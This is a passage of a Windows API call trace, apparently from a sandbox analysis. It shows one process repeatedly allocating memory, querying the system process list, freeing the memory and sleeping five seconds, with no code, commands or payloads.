BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.138] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.142] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.157] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.189] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.189] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.191] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.192] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.196] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.217] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.224] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.225] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.226] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.226] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.230] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.238] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.238] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.241] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.245] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.253] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0241.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0241.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0241.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0241.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0241.315] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0241.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0241.317] NtQuerySystemInformation (in: 